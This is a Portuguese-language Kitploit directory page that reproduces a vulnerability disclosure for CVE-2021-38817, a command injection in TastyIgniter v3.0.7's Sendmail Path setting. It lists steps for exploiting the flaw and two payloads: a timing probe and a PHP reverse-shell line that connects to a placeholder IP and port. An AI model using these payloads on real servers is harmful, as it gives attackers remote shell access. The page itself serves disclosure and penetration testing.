Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-38817-Remote-OS-Command-Injection — Injeção Remota de Comando no Sistema Operacional no campo Caminho do Sendmail do TastyIgniter v3.0.7 | Kitploit
Ferramentas/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

Injeção Remota de Comando no Sistema Operacional no campo Caminho do Sendmail do TastyIgniter v3.0.7

Ver Repositório
9241há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-38817-Remote-OS-Command-Injection

Injeção Remota de Comandos do Sistema Operacional / Execução Remota de Código Autenticada no TastyIgniter v3.0.7 - Parte web do Sendmail (CVE-2021-38817)

Existe uma vulnerabilidade de injeção remota de comandos do sistema operacional autenticada no menu de configuração do Sendmail do CMS Restaurante TastyIgniter v3.0.7 para a aplicação web. O parâmetro Caminho do Sendmail não é sanitizado corretamente, conforme indicado pelo comando /usr/sbin/sendmail -bs preenchido no campo, e permite que comandos arbitrários sejam injetados adicionando um ponto-e-vírgula e um comando adicional do sistema operacional.

Componentes Afetados

URL: /admin/settings/edit/mail

Campo:

  • Protocolo de Correio: Sendmail
  • Campo: Caminho do Sendmail

POC

  • Autentique-se no portal /admin com credenciais.
  • Navegue para /admin/settings/edit/mail
  • No menu suspenso Protocolo de Correio, selecione Sendmail
  • No novo campo Caminho do SendMail, adicione um ponto-e-vírgula e um comando arbitrário do sistema operacional, ex.: /usr/sbin/sendmail -bs; sleep 10
  • Payloads

    • /usr/sbin/sendmail -bs; sleep 10
    • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

    TastyIgniterCVE

    Descoberto por

    Matt Kiely (HuskyHacks) e Mike Padrick (Fearless), Agosto de 2021

    CVE atribuído em Outubro de 2022 (kkkk)

    Baixar ferramenta